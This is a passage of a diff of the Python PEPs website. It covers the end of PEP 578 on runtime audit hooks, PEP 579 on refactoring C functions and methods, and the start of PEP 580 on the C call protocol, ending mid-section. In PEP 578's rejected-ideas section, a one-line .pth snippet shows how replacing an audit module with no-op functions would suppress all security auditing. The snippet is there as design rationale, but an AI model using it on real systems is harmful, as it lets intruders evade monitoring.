Most kernels offer ways to restrict or audit binaries loaded and executed +by the kernel. File types owned by Python appear as regular data and +these features do not apply. This open hook allows Python embedders to +integrate with operating system support when launching scripts or +importing Python code.

+

The new public C API for the verified open hook is:

+
# Set the handler
+typedef PyObject *(*hook_func)(PyObject *path, void *userData)
+int PyFile_SetOpenCodeHook(hook_func handler, void *userData)
+
+# Open a file using the handler
+PyObject *PyFile_OpenCode(const char *path)
+
+
+

The new public Python API for the verified open hook is:

+
# Open a file using the handler
+io.open_code(path : str) -> io.IOBase
+
+
+

The io.open_code() function is a drop-in replacement for +open(abspath(str(pathlike)), 'rb'). Its default behaviour is to +open a file for raw, binary access. To change the behaviour a new +handler should be set. Handler functions only accept str arguments. +The C API PyFile_OpenCode function assumes UTF-8 encoding. Paths +must be absolute, and it is the responsibility of the caller to ensure +the full path is correctly resolved.

+

A custom handler may be set by calling PyFile_SetOpenCodeHook() from +C at any time, including before Py_Initialize(). However, if a hook +has already been set then the call will fail. When open_code() is +called with a hook set, the hook will be passed the path and its return +value will be returned directly. The returned object should be an open +file-like object that supports reading raw bytes. This is explicitly +intended to allow a BytesIO instance if the open handler has already +read the entire file into memory.

+

Note that these hooks can import and call the _io.open() function on +CPython without triggering themselves. They can also use _io.BytesIO +to return a compatible result using an in-memory buffer.

+

If the hook determines that the file should not be loaded, it should +raise an exception of its choice, as well as performing any other +logging.

+

All import and execution functionality involving code from a file will +be changed to use open_code() unconditionally. It is important to +note that calls to compile(), exec() and eval() do not go +through this function - an audit hook that includes the code from these +calls is the best opportunity to validate code that is read from the +file. Given the current decoupling between import and execution in +Python, most imported code will go through both open_code() and the +log hook for compile, and so care should be taken to avoid +repeating verification steps.

+

File accesses that are not intentionally planning to execute code are +not expected to use this function. This includes loading pickles, XML +or YAML files, where code execution is generally considered malicious +rather than intentional. These operations should provide their own +auditing events, preferably distinguishing between normal functionality +(for example, Unpickler.load) and code execution +(Unpickler.find_class).

+

A few examples: if the file type normally requires an execute bit (on +POSIX) or would warn when marked as having been downloaded from the +internet (on Windows), it should probably use open_code() rather +than plain open(). Opening ZIP files using the ZipFile class +should use open(), while opening them via zipimport should use +open_code() to signal the correct intent. Code that uses the wrong +function for a particular context may bypass the hook, which in CPython +and the standard library should be considered a bug. Using a combination +of open_code hooks and auditing hooks is necessary to trace all +executed sources in the presence of arbitrary code.

+

There is no Python API provided for changing the open hook. To modify +import behavior from Python code, use the existing functionality +provided by importlib.

+
+
+

API Availability

+

While all the functions added here are considered public and stable API, +the behavior of the functions is implementation specific. Most +descriptions here refer to the CPython implementation, and while other +implementations should provide the functions, there is no requirement +that they behave the same.

+

For example, sys.addaudithook() and sys.audit() should exist but +may do nothing. This allows code to make calls to sys.audit() +without having to test for existence, but it should not assume that its +call will have any effect. (Including existence tests in +security-critical code allows another vector to bypass auditing, so it +is preferable that the function always exist.)

+

io.open_code(path) should at a minimum always return +_io.open(path, 'rb'). Code using the function should make no further +assumptions about what may occur, and implementations other than CPython +are not required to let developers override the behavior of this +function with a hook.

+
+
+
+

Suggested Audit Hook Locations

+

The locations and parameters in calls to sys.audit() or +PySys_Audit() are to be determined by individual Python +implementations. This is to allow maximum freedom for implementations +to expose the operations that are most relevant to their platform, +and to avoid or ignore potentially expensive or noisy events.

+

Table 1 acts as both suggestions of operations that should trigger +audit events on all implementations, and examples of event schemas.

+

Table 2 provides further examples that are not required, but are +likely to be available in CPython.

+

Refer to the documentation associated with your version of Python to +see which operations provide audit events.

+ + ++++++ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Table 1: Suggested Audit Hooks
API FunctionEvent NameArgumentsRationale
PySys_AddAuditHooksys.addaudithookDetect when new +audit hooks are being added.
PyFile_SetOpenCodeHookcpython.PyFile_SetOpenCodeHookDetects any attempt to set the open_code hook.
compile, exec, eval, PyAst_CompileString, +PyAST_obj2modcompile(code, filename_or_none)Detect dynamic code compilation, where code could be a string or +AST. Note that this will be called for regular imports of source +code, including those that were opened with open_code.
exec, eval, run_modexec(code_object,)Detect dynamic execution of code objects. This only occurs for +explicit calls, and is not raised for normal function invocation.
importimport(module, filename, sys.path, +sys.meta_path, sys.path_hooks)Detect when modules are +imported. This is raised before the module name is resolved to a +file. All arguments other than the module name may be None if +they are not used or available.
openio.open(path, mode, flags)Detect when a +file is about to be opened. path and mode are the usual parameters +to open if available, while flags is provided instead of mode +in some cases.
PyEval_SetProfilesys.setprofileDetect when code is +injecting trace functions. Because of the implementation, exceptions +raised from the hook will abort the operation, but will not be +raised in Python code. Note that threading.setprofile eventually +calls this function, so the event will be audited for each thread.
PyEval_SetTracesys.settraceDetect when code is +injecting trace functions. Because of the implementation, exceptions +raised from the hook will abort the operation, but will not be +raised in Python code. Note that threading.settrace eventually +calls this function, so the event will be audited for each thread.
_PyObject_GenericSetAttr, check_set_special_type_attr, +object_set_class, func_set_code, func_set_[kw]defaultsobject.__setattr__(object, attr, value)Detect monkey +patching of types and objects. This event +is raised for the __class__ attribute and any attribute on +type objects.
_PyObject_GenericSetAttrobject.__delattr__(object, +attr)Detect deletion of object attributes. This event is raised +for any attribute on type objects.
Unpickler.find_classpickle.find_class(module_name, +global_name)Detect imports and global name lookup when +unpickling.
+ + ++++++ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Table 2: Potential CPython Audit Hooks
API FunctionEvent NameArgumentsRationale
_PySys_ClearAuditHookssys._clearaudithooksNotifies +hooks they are being cleaned up, mainly in case the event is +triggered unexpectedly. This event cannot be aborted.
code_newcode.__new__(bytecode, filename, name)Detect dynamic creation of code objects. This only occurs for +direct instantiation, and is not raised for normal compilation.
func_new_implfunction.__new__(code,)Detect +dynamic creation of function objects. This only occurs for direct +instantiation, and is not raised for normal compilation.
_ctypes.dlopen, _ctypes.LoadLibraryctypes.dlopen(module_or_path,)Detect when native modules are used.
_ctypes._FuncPtrctypes.dlsym(lib_object, name)Collect information about specific symbols retrieved from native +modules.
_ctypes._CDatactypes.cdata(ptr_as_int,)Detect +when code is accessing arbitrary memory using ctypes.
new_mmap_objectmmap.__new__(fileno, map_size, access, +offset)Detects creation of mmap objects. On POSIX, access may +have been calculated from the prot and flags arguments.
sys._getframesys._getframe(frame_object,)Detect +when code is accessing frames directly.
sys._current_framessys._current_framesDetect when +code is accessing frames directly.
socket.bind, socket.connect, socket.connect_ex, +socket.getaddrinfo, socket.getnameinfo, socket.sendmsg, +socket.sendtosocket.address(socket, address,)Detect access to network resources. The address is unmodified from +the original call.
member_get, func_get_code, func_get_[kw]defaultsobject.__getattr__(object, attr)Detect access to +restricted attributes. This event is raised for any built-in +members that are marked as restricted, and members that may allow +bypassing imports.
urllib.urlopenurllib.Request(url, data, headers, +method)Detects URL requests.
+
+
+

Performance Impact

+

The important performance impact is the case where events are being +raised but there are no hooks attached. This is the unavoidable case - +once a developer has added audit hooks they have explicitly chosen to +trade performance for functionality. Performance impact with hooks added +are not of interest here, since this is opt-in functionality.

+

Analysis using the Python Performance Benchmark Suite [1] shows no +significant impact, with the vast majority of benchmarks showing +between 1.05x faster to 1.05x slower.

+

In our opinion, the performance impact of the set of auditing points +described in this PEP is negligible.

+
+
+

Rejected Ideas

+
+

Separate module for audit hooks

+

The proposal is to add a new module for audit hooks, hypothetically +audit. This would separate the API and implementation from the +sys module, and allow naming the C functions PyAudit_AddHook and +PyAudit_Audit rather than the current variations.

+

Any such module would need to be a built-in module that is guaranteed to +always be present. The nature of these hooks is that they must be +callable without condition, as any conditional imports or calls provide +opportunities to intercept and suppress or modify events.

+

Given it is one of the most core modules, the sys module is somewhat +protected against module shadowing attacks. Replacing sys with a +sufficiently functional module that the application can still run is a +much more complicated task than replacing a module with only one +function of interest. An attacker that has the ability to shadow the +sys module is already capable of running arbitrary code from files, +whereas an audit module could be replaced with a single line in a +.pth file anywhere on the search path:

+
import sys; sys.modules['audit'] = type('audit', (object,),
+    {'audit': lambda *a: None, 'addhook': lambda *a: None})
+
+
+

Multiple layers of protection already exist for monkey patching attacks +against either sys or audit, but assignments or insertions to +sys.modules are not audited.

+

This idea is rejected because it makes it trivial to suppress all calls +to audit.

+
+
+

Flag in sys.flags to indicate “audited” mode

+

The proposal is to add a value in sys.flags to indicate when Python +is running in a “secure” or “audited” mode. This would allow +applications to detect when some features are enabled or when hooks +have been added and modify their behaviour appropriately.

+

Currently, we are not aware of any legitimate reasons for a program to +behave differently in the presence of audit hooks.

+

Both application-level APIs sys.audit and io.open_code are +always present and functional, regardless of whether the regular +python entry point or some alternative entry point is used. Callers +cannot determine whether any hooks have been added (except by performing +side-channel analysis), nor do they need to. The calls should be fast +enough that callers do not need to avoid them, and the program is +responsible for ensuring that any added hooks are fast enough to not +affect application performance.

+

The argument that this is “security by obscurity” is valid, but +irrelevant. Security by obscurity is only an issue when there are no +other protective mechanisms; obscurity as the first step in avoiding +attack is strongly recommended (see this article for +discussion).

+

This idea is rejected because there are no appropriate reasons for an +application to change its behaviour based on whether these APIs are in +use.

+
+
+
+

Why Not A Sandbox

+

Sandboxing CPython has been attempted many times in the past, and each +past attempt has failed. Fundamentally, the problem is that certain +functionality has to be restricted when executing the sandboxed code, +but otherwise needs to be available for normal operation of Python. For +example, completely removing the ability to compile strings into +bytecode also breaks the ability to import modules from source code, and +if it is not completely removed then there are too many ways to get +access to that functionality indirectly. There is not yet any feasible +way to generically determine whether a given operation is “safe” or not. +Further information and references available at [2].

+

This proposal does not attempt to restrict functionality, but simply +exposes the fact that the functionality is being used. Particularly for +intrusion scenarios, detection is significantly more important than +early prevention (as early prevention will generally drive attackers to +use an alternate, less-detectable, approach). The availability of audit +hooks alone does not change the attack surface of Python in any way, but +they enable defenders to integrate Python into their environment in ways +that are currently not possible.

+

Since audit hooks have the ability to safely prevent an operation +occurring, this feature does enable the ability to provide some level of +sandboxing. In most cases, however, the intention is to enable logging +rather than creating a sandbox.

+
+
+

Relationship to PEP 551

+

This API was originally presented as part of +PEP 551 Security +Transparency in the Python Runtime.

+

For simpler review purposes, and due to the broader applicability of +these APIs beyond security, the API design is now presented separately.

+

PEP 551 is an informational PEP discussing how to integrate Python into +a secure or audited environment.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0578.rst

+

Last modified: 2024-06-03 14:51:21 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0579/index.html b/pep-0579/index.html new file mode 100644 index 00000000000..f835f4b267c --- /dev/null +++ b/pep-0579/index.html @@ -0,0 +1,549 @@ + + + + + + + + PEP 579 – Refactoring C functions and methods | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 579 – Refactoring C functions and methods

+
+
Author:
+
Jeroen Demeyer <J.Demeyer at UGent.be>
+
BDFL-Delegate:
+
Petr Viktorin
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
04-Jun-2018
+
Post-History:
+
20-Jun-2018
+
+
+
+
Table of Contents +
+
+

Approval Notice

+

This PEP describes design issues addressed in PEP 575, PEP 580, PEP 590 +(and possibly later proposals).

+

As noted in PEP 1:

+
+
Informational PEPs do not necessarily represent a Python community +consensus or recommendation, so users and implementers are free to +ignore Informational PEPs or follow their advice.
+

While there is no consensus on whether the issues or the solutions in +this PEP are valid, the list is still useful to guide further design.

+
+
+

Abstract

+

This meta-PEP collects various issues with CPython’s existing implementation +of built-in functions (functions implemented in C) and methods.

+

Fixing all these issues is too much for one PEP, +so that will be delegated to other standards track PEPs. +However, this PEP does give some brief ideas of possible fixes. +This is mainly meant to coordinate an overall strategy. +For example, a proposed solution may sound too complicated +for fixing any one single issue, but it may be the best overall +solution for multiple issues.

+

This PEP is purely informational: +it does not imply that all issues will eventually +be fixed, nor that they will be fixed using the solution proposed here.

+

It also serves as a check-list of possible requested features +to verify that a given fix does not make those +other features harder to implement.

+

The major proposed change is replacing PyMethodDef +by a new structure PyCCallDef +which collects everything needed for calling the function/method. +In the PyTypeObject structure, a new field tp_ccalloffset +is added giving an offset to a PyCCallDef * in the object structure.

+

NOTE: This PEP deals only with CPython implementation details, +it does not affect the Python language or standard library.

+
+
+

Issues

+

This lists various issues with built-in functions and methods, +together with a plan for a solution and (if applicable) +pointers to standards track PEPs discussing the details.

+
+

1. Naming

+

The word “built-in” is overused in Python. +From a quick skim of the Python documentation, it mostly refers +to things from the builtins module. +In other words: things which are available in the global namespace +without a need for importing them. +This conflicts with the use of the word “built-in” to mean “implemented in C”.

+

Solution: since the C structure for built-in functions and methods is already +called PyCFunctionObject, +let’s use the name “cfunction” and “cmethod” instead of “built-in function” +and “built-in method”.

+
+
+

2. Not extendable

+

The various classes involved (such as builtin_function_or_method) +cannot be subclassed:

+
>>> from types import BuiltinFunctionType
+>>> class X(BuiltinFunctionType):
+...     pass
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: type 'builtin_function_or_method' is not an acceptable base type
+
+
+

This is a problem because it makes it impossible to add features +such as introspection support to these classes.

+

If one wants to implement a function in C with additional functionality, +an entirely new class must be implemented from scratch. +The problem with this is that the existing classes like +builtin_function_or_method are special-cased in the Python interpreter +to allow faster calling (for example, by using METH_FASTCALL). +It is currently impossible to have a custom class with the same optimizations.

+

Solution: make the existing optimizations available to arbitrary classes. +This is done by adding a new PyTypeObject field tp_ccalloffset +(or can we re-use tp_print for that?) +specifying the offset of a PyCCallDef pointer. +This is a new structure holding all information needed to call +a cfunction and it would be used instead of PyMethodDef. +This implements the new “C call” protocol.

+

For constructing cfunctions and cmethods, PyMethodDef arrays +will still be used (for example, in tp_methods) but that will +be the only remaining purpose of the PyMethodDef structure.

+

Additionally, we can also make some function classes subclassable. +However, this seems less important once we have tp_ccalloffset.

+

Reference: PEP 580

+
+
+

3. cfunctions do not become methods

+

A cfunction like repr does not implement __get__ to bind +as a method:

+
>>> class X:
+...     meth = repr
+>>> x = X()
+>>> x.meth()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: repr() takes exactly one argument (0 given)
+
+
+

In this example, one would have expected that x.meth() returns +repr(x) by applying the normal rules of methods.

+

This is surprising and a needless difference +between cfunctions and Python functions. +For the standard built-in functions, this is not really a problem +since those are not meant to used as methods. +But it does become a problem when one wants to implement a +new cfunction with the goal of being usable as method.

+

Again, a solution could be to create a new class behaving just +like cfunctions but which bind as methods. +However, that would lose some existing optimizations for methods, +such as the LOAD_METHOD/CALL_METHOD opcodes.

+

Solution: the same as the previous issue. +It just shows that handling self and __get__ +should be part of the new C call protocol.

+

For backwards compatibility, we would keep the existing non-binding +behavior of cfunctions. We would just allow it in custom classes.

+

Reference: PEP 580

+
+
+

4. Semantics of inspect.isfunction

+

Currently, inspect.isfunction returns True only for instances +of types.FunctionType. +That is, true Python functions.

+

A common use case for inspect.isfunction is checking for introspection: +it guarantees for example that inspect.getfile() will work. +Ideally, it should be possible for other classes to be treated as +functions too.

+

Solution: introduce a new InspectFunction abstract base class +and use that to implement inspect.isfunction. +Alternatively, use duck typing for inspect.isfunction +(as proposed in [2]):

+
def isfunction(obj):
+    return hasattr(type(obj), "__code__")
+
+
+
+
+

5. C functions should have access to the function object

+

The underlying C function of a cfunction currently +takes a self argument (for bound methods) +and then possibly a number of arguments. +There is no way for the C function to actually access the Python +cfunction object (the self in __call__ or tp_call). +This would for example allow implementing the +C call protocol for Python functions (types.FunctionType): +the C function which implements calling Python functions +needs access to the __code__ attribute of the function.

+

This is also needed for PEP 573 +where all cfunctions require access to their “parent” +(the module for functions of a module or the defining class +for methods).

+

Solution: add a new PyMethodDef flag to specify +that the C function takes an additional argument (as first argument), +namely the function object.

+

References: PEP 580, PEP 573

+
+
+

6. METH_FASTCALL is private and undocumented

+

The METH_FASTCALL mechanism allows calling cfunctions and cmethods +using a C array of Python objects instead of a tuple. +This was introduced in Python 3.6 for positional arguments only +and extended in Python 3.7 with support for keyword arguments.

+

However, given that it is undocumented, +it is presumably only supposed to be used by CPython itself.

+

Solution: since this is an important optimization, +everybody should be encouraged to use it. +Now that the implementation of METH_FASTCALL is stable, document it!

+

As part of the C call protocol, we should also add a C API function

+
PyObject *PyCCall_FastCall(PyObject *func, PyObject *const *args, Py_ssize_t nargs, PyObject *keywords)
+
+
+

Reference: PEP 580

+
+
+

7. Allowing native C arguments

+

A cfunction always takes its arguments as Python objects +(say, an array of PyObject pointers). +In cases where the cfunction is really wrapping a native C function +(for example, coming from ctypes or some compiler like Cython), +this is inefficient: calls from C code to C code are forced to use +Python objects to pass arguments.

+

Analogous to the buffer protocol which allows access to C data, +we should also allow access to the underlying C callable.

+

Solution: when wrapping a C function with native arguments +(for example, a C long) inside a cfunction, +we should also store a function pointer to the underlying C function, +together with its C signature.

+

Argument Clinic could automatically do this by storing +a pointer to the “impl” function.

+
+
+

8. Complexity

+

There are a huge number of classes involved to implement +all variations of methods. +This is not a problem by itself, but a compounding issue.

+

For ordinary Python classes, the table below gives the classes +for various kinds of methods. +The columns refer to the class in the class __dict__, +the class for unbound methods (bound to the class) +and the class for bound methods (bound to the instance):

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
kind__dict__unboundbound
Normal methodfunctionfunctionmethod
Static methodstaticmethodfunctionfunction
Class methodclassmethodmethodmethod
Slot methodfunctionfunctionmethod
+

This is the analogous table for extension types (C classes):

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
kind__dict__unboundbound
Normal methodmethod_descriptormethod_descriptorbuiltin_function_or_method
Static methodstaticmethodbuiltin_function_or_methodbuiltin_function_or_method
Class methodclassmethod_descriptorbuiltin_function_or_methodbuiltin_function_or_method
Slot methodwrapper_descriptorwrapper_descriptormethod-wrapper
+

There are a lot of classes involved +and these two tables look very different. +There is no good reason why Python methods should be +treated fundamentally different from C methods. +Also the features are slightly different: +for example, method supports __func__ +but builtin_function_or_method does not.

+

Since CPython has optimizations for calls to most of these objects, +the code for dealing with them can also become complex. +A good example of this is the call_function function in Python/ceval.c.

+

Solution: all these classes should implement the C call protocol. +Then the complexity in the code can mostly be fixed by +checking for the C call protocol (tp_ccalloffset != 0) +instead of doing type checks.

+

Furthermore, it should be investigated whether some of these classes can be merged +and whether method can be re-used also for bound methods of extension types +(see PEP 576 for the latter, +keeping in mind that this may have some minor backwards compatibility issues). +This is not a goal by itself but just something to keep in mind +when working on these classes.

+
+
+

9. PyMethodDef is too limited

+

The typical way to create a cfunction or cmethod in an extension module +is by using a PyMethodDef to define it. +These are then stored in an array PyModuleDef.m_methods +(for cfunctions) or PyTypeObject.tp_methods (for cmethods). +However, because of the stable ABI (PEP 384), +we cannot change the PyMethodDef structure.

+

So, this means that we cannot add new fields for creating cfunctions/cmethods +this way. +This is probably the reason for the hack that +__doc__ and __text_signature__ are stored in the same C string +(with the __doc__ and __text_signature__ descriptors extracting +the relevant part).

+

Solution: stop assuming that a single PyMethodDef entry +is sufficient to describe a cfunction/cmethod. +Instead, we could add some flag which means that one of the PyMethodDef +fields is instead a pointer to an additional structure. +Or, we could add a flag to use two or more consecutive PyMethodDef +entries in the array to store more data. +Then the PyMethodDef array would be used only to construct +cfunctions/cmethods but it would no longer be used after that.

+
+
+

10. Slot wrappers have no custom documentation

+

Right now, slot wrappers like __init__ or __lt__ only have very +generic documentation, not at all specific to the class:

+
>>> list.__init__.__doc__
+'Initialize self.  See help(type(self)) for accurate signature.'
+>>> list.__lt__.__doc__
+'Return self<value.'
+
+
+

The same happens for the signature:

+
>>> list.__init__.__text_signature__
+'($self, /, *args, **kwargs)'
+
+
+

As you can see, slot wrappers do support __doc__ +and __text_signature__. +The problem is that these are stored in struct wrapperbase, +which is common for all wrappers of a specific slot +(for example, the same wrapperbase is used for str.__eq__ and int.__eq__).

+

Solution: rethink the slot wrapper class to allow docstrings +(and text signatures) for each instance separately.

+

This still leaves the question of how extension modules +should specify the documentation. +The PyTypeObject entries like tp_init are just function pointers, +we cannot do anything with those. +One solution would be to add entries to the tp_methods array +just for adding docstrings. +Such an entry could look like

+
{"__init__", NULL, METH_SLOTDOC, "pointer to __init__ doc goes here"}
+
+
+
+
+

11. Static methods and class methods should be callable

+

Instances of staticmethod and classmethod should be callable. +Admittedly, there is no strong use case for this, +but it has occasionally been requested (see for example [1]).

+

Making static/class methods callable would increase consistency. +First of all, function decorators typically add functionality or modify +a function, but the result remains callable. This is not true for +@staticmethod and @classmethod.

+

Second, class methods of extension types are already callable:

+
>>> fromhex = float.__dict__["fromhex"]
+>>> type(fromhex)
+<class 'classmethod_descriptor'>
+>>> fromhex(float, "0xff")
+255.0
+
+
+

Third, one can see function, staticmethod and classmethod +as different kinds of unbound methods: +they all become method when bound, but the implementation of __get__ +is slightly different. +From this point of view, it looks strange that function is callable +but the others are not.

+

Solution: +when changing the implementation of staticmethod, classmethod, +we should consider making instances callable. +Even if this is not a goal by itself, it may happen naturally +because of the implementation.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0579.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0580/index.html b/pep-0580/index.html new file mode 100644 index 00000000000..e67a1ea1edf --- /dev/null +++ b/pep-0580/index.html @@ -0,0 +1,863 @@ + + + + + + + + PEP 580 – The C call protocol | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 580 – The C call protocol

+
+
Author:
+
Jeroen Demeyer <J.Demeyer at UGent.be>
+
BDFL-Delegate:
+
Petr Viktorin
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
14-Jun-2018
+
Python-Version:
+
3.8
+
Post-History:
+
20-Jun-2018, 22-Jun-2018, 16-Jul-2018
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP is rejected in favor of PEP 590, which proposes a simpler public +C API for callable objects.

+
+
+

Abstract

+

A new “C call” protocol is proposed. +It is meant for classes representing functions or methods +which need to implement fast calling. +The goal is to generalize all existing optimizations for built-in functions +to arbitrary extension types.

+

In the reference implementation, +this new protocol is used for the existing classes +builtin_function_or_method and method_descriptor. +However, in the future, more classes may implement it.

+

NOTE: This PEP deals only with the Python/C API, +it does not affect the Python language or standard library.

+
+
+

Motivation

+

The standard function/method classes builtin_function_or_method +and method_descriptor allow very efficiently calling C code. +However, they are not subclassable, making them unsuitable for many applications: +for example, they offer limited introspection support +(signatures only using __text_signature__, no arbitrary __qualname__, +no inspect.getfile()). +It’s also not possible to store additional data to implement something like +functools.partial or functools.lru_cache. +So, there are many reasons why users would want to implement custom +function/method classes (in a duck-typing sense) in C. +Unfortunately, such custom classes are necessarily slower than +the standard CPython function classes: +the bytecode interpreter has various optimizations +which are specific to instances of +builtin_function_or_method, method_descriptor, method and function.

+

This PEP also allows to simplify existing code: +checks for builtin_function_or_method and method_descriptor +could be replaced by simply checking for and using the C call protocol. +Future PEPs may implement the C call protocol for more classes, +enabling even further simplifications.

+

We also design the C call protocol such that it can easily +be extended with new features in the future.

+

For more background and motivation, see PEP 579.

+
+
+

Overview

+

Currently, CPython has multiple optimizations for fast calling +for a few specific function classes. +A good example is the implementation of the opcode CALL_FUNCTION, +which has the following structure +(see the actual code):

+
if (PyCFunction_Check(func)) {
+    return _PyCFunction_FastCallKeywords(func, stack, nargs, kwnames);
+}
+else if (Py_TYPE(func) == &PyMethodDescr_Type) {
+    return _PyMethodDescr_FastCallKeywords(func, stack, nargs, kwnames);
+}
+else {
+    if (PyMethod_Check(func) && PyMethod_GET_SELF(func) != NULL) {
+        /* ... */
+    }
+    if (PyFunction_Check(func)) {
+        return _PyFunction_FastCallKeywords(func, stack, nargs, kwnames);
+    }
+    else {
+        return _PyObject_FastCallKeywords(func, stack, nargs, kwnames);
+    }
+}
+
+
+

Calling instances of these special-cased classes +using the tp_call slot is slower than using the optimizations. +The basic idea of this PEP is to enable such optimizations +for user C code, both as caller and as callee.

+

The existing class builtin_function_or_method and a few others +use a PyMethodDef structure for describing the underlying C function and its signature. +The first concrete change is that this is replaced by a new structure PyCCallDef. +This stores some of the same information as a PyMethodDef, +but with one important addition: +the “parent” of the function (the class or module where it is defined). +Note that PyMethodDef arrays are still used to construct +functions/methods but no longer for calling them.

+

Second, we want that every class can use such a PyCCallDef for optimizing calls, +so the PyTypeObject structure gains a tp_ccalloffset field +giving an offset to a PyCCallDef * in the object structure +and a flag Py_TPFLAGS_HAVE_CCALL indicating that tp_ccalloffset is valid.

+

Third, since we want to deal efficiently with unbound and bound methods too +(as opposed to only plain functions), we need to handle __self__ in the protocol: +after the PyCCallDef * in the object structure, +there is a PyObject *self field. +These two fields together are referred to as a PyCCallRoot structure.

+

The new protocol for efficiently calling objects using these new structures +is called the “C call protocol”.

+

NOTE: In this PEP, the phrases “unbound method” and “bound method” +refer to generic behavior, not to specific classes. +For example, an unbound method gets turned into a bound method +after applying __get__.

+
+
+

New data structures

+

The PyTypeObject structure gains a new field Py_ssize_t tp_ccalloffset +and a new flag Py_TPFLAGS_HAVE_CCALL. +If this flag is set, then tp_ccalloffset is assumed to be a valid +offset inside the object structure (similar to tp_dictoffset and tp_weaklistoffset). +It must be a strictly positive integer. +At that offset, a PyCCallRoot structure appears:

+
typedef struct {
+    const PyCCallDef *cr_ccall;
+    PyObject         *cr_self;  /* __self__ argument for methods */
+} PyCCallRoot;
+
+
+

The PyCCallDef structure contains everything needed to describe how +the function can be called:

+
typedef struct {
+    uint32_t  cc_flags;
+    PyCFunc   cc_func;    /* C function to call */
+    PyObject *cc_parent;  /* class or module */
+} PyCCallDef;
+
+
+

The reason for putting __self__ outside of PyCCallDef +is that PyCCallDef is not meant to be changed after creating the function. +A single PyCCallDef can be shared +by an unbound method and multiple bound methods. +This wouldn’t work if we would put __self__ inside that structure.

+

NOTE: unlike tp_dictoffset we do not allow negative numbers +for tp_ccalloffset to mean counting from the end. +There does not seem to be a use case for it and it would only complicate +the implementation.

+
+

Parent

+

The cc_parent field (accessed for example by a __parent__ +or __objclass__ descriptor from Python code) can be any Python +object, or NULL. +Custom classes are free to set cc_parent to whatever they want. +It is only used by the C call protocol if the +CCALL_OBJCLASS flag is set.

+

For methods of extension types, cc_parent points to the class +that defines the method (which may be a superclass of type(self)). +This is currently non-trivial to retrieve from a method’s code. +In the future, this can be used to access the module state via +the defining class. See the rationale of PEP 573 for details.

+

When the flag CCALL_OBJCLASS is set (as it will be for methods of +extension types), cc_parent is used for type checks like the following:

+
>>> list.append({}, "x")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: descriptor 'append' requires a 'list' object but received a 'dict'
+
+
+

For functions of modules, cc_parent is set to the module. +Currently, this is exactly the same as __self__. +However, using __self__ for the module is a quirk of the current implementation: +in the future, we want to allow functions which use __self__ +in the normal way, for implementing methods. +Such functions can still use cc_parent instead to refer to the module.

+

The parent would also typically be used to implement __qualname__. +The new C API function PyCCall_GenericGetQualname() does exactly that.

+
+
+

Using tp_print

+

We propose to replace the existing unused field tp_print +by tp_ccalloffset. +Since Py_TPFLAGS_HAVE_CCALL would not be added to +Py_TPFLAGS_DEFAULT, this ensures full backwards compatibility for +existing extension modules setting tp_print. +It also means that we can require that tp_ccalloffset is a valid +offset when Py_TPFLAGS_HAVE_CCALL is specified: +we do not need to check tp_ccalloffset != 0. +In future Python versions, we may decide that tp_print +becomes tp_ccalloffset unconditionally, +drop the Py_TPFLAGS_HAVE_CCALL flag and instead check for +tp_ccalloffset != 0.

+

NOTE: the exact layout of PyTypeObject is not part of the stable ABI). +Therefore, changing the tp_print field from a printfunc (a function pointer) +to a Py_ssize_t should not be a problem, +even if this changes the memory layout of the PyTypeObject structure. +Moreover, on all systems for which binaries are commonly built +(Windows, Linux, macOS), +the size of printfunc and Py_ssize_t are the same, +so the issue of binary compatibility will not come up anyway.

+
+
+
+

The C call protocol

+

We say that a class implements the C call protocol +if it has the Py_TPFLAGS_HAVE_CCALL flag set +(as explained above, it must then set tp_ccalloffset > 0). +Such a class must implement __call__ as described in this section +(in practice, this just means setting tp_call to PyCCall_Call).

+

The cc_func field is a C function pointer, +which plays the same role as the existing ml_meth field of PyMethodDef. +Its precise signature depends on flags. +The subset of flags influencing the signature of cc_func +is given by the bitmask CCALL_SIGNATURE. +Below are the possible values for cc_flags & CCALL_SIGNATURE +together with the arguments that the C function takes. +The return value is always PyObject *. +The following are analogous to the existing PyMethodDef +signature flags:

+
    +
  • CCALL_VARARGS: +cc_func(PyObject *self, PyObject *args)
  • +
  • CCALL_VARARGS | CCALL_KEYWORDS: +cc_func(PyObject *self, PyObject *args, PyObject *kwds) +(kwds is either NULL or a dict; this dict must not be modified by the callee)
  • +
  • CCALL_FASTCALL: +cc_func(PyObject *self, PyObject *const *args, Py_ssize_t nargs)
  • +
  • CCALL_FASTCALL | CCALL_KEYWORDS: +cc_func(PyObject *self, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames) +(kwnames is either NULL or a non-empty tuple of keyword names)
  • +
  • CCALL_NOARGS: +cc_func(PyObject *self, PyObject *unused) (second argument is always NULL)
  • +
  • CCALL_O: +cc_func(PyObject *self, PyObject *arg)
  • +
+

The flag CCALL_DEFARG may be combined with any of these. +If so, the C function takes an additional argument +as first argument before self, +namely a const pointer to the PyCCallDef structure used for this call. +For example, we have the following signature:

+
    +
  • CCALL_DEFARG | CCALL_VARARGS: +cc_func(const PyCCallDef *def, PyObject *self, PyObject *args)
